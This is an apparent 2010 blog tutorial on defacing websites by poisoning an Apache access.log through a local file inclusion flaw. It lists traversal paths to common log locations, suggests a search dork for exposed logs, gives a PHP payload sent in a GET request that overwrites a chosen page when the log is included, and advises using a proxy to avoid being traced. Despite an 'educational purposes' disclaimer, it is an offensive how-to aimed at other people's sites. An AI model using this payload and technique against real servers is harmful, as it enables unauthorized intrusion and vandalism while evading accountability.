Monday, June 14, 2010

defacing when access.log is accessible

Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.

I have tested it on wampserver (apache version 2.2.11 dont know about others). So, here I am going to show how we can change/deface any page on the server if the access log is accessible.

How to access the access.log?
For that, you need to find a LFI vulnerability on target site. and from that LFI, you can include access log. Here are some probable locations of access.log.
../apache/logs/access.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
or simply you can use the dork (inurl:access.log). and you'll be surprised to see so many logs at handy!

Ok, so moving on...

If you find a website with access.log accessible, do the following steps.

make the following GET request to the website by means of telnet or anything else you wish.

GET /<*?php $vips='---DEFACED---'; $fp = fopen('--LOCATION OF THE WEBPAGE FROM LOG--', 'w'); fputs($fp, $vips); fclose($fp); ?*> HTTP/1.1

(remove the stars *)

but before making this GET request, you need to make some changes in it.. (double quotes in the GET request maybe escaped before logging, so, here i am not making use of them)
--DEFACED-- : you have to replace this by html code which will be placed as a defacement.
--LOCATION OF WEBPAGE FROM LOG-- : this is location of the webpage from the log. For example, if the log is in the directory 'logs' and webpage to deface is in the directory 'pages' and both are in directory 'web' then this value will be '../pages/index.htm' where index.htm is the name of page to deface.

after making these changes, make the get request to the website.

Here, what we have done, we have injected php code in access.log. what php code does, it changes the content of the index.htm to our provided html content. But this will happen only if we open access.log. So, now go to lfi page and include access.log from there or open the direct link to log which you may have found from dork.
The size of access.log maybe huge depending on popularity of website... but keep it loading.. after some time, when our malicious GET request will be loaded, then php code will be executed and if successful, we can see the defaced page... be sure to use a proxy! your ip address will be easily logged.

No comments:

Post a Comment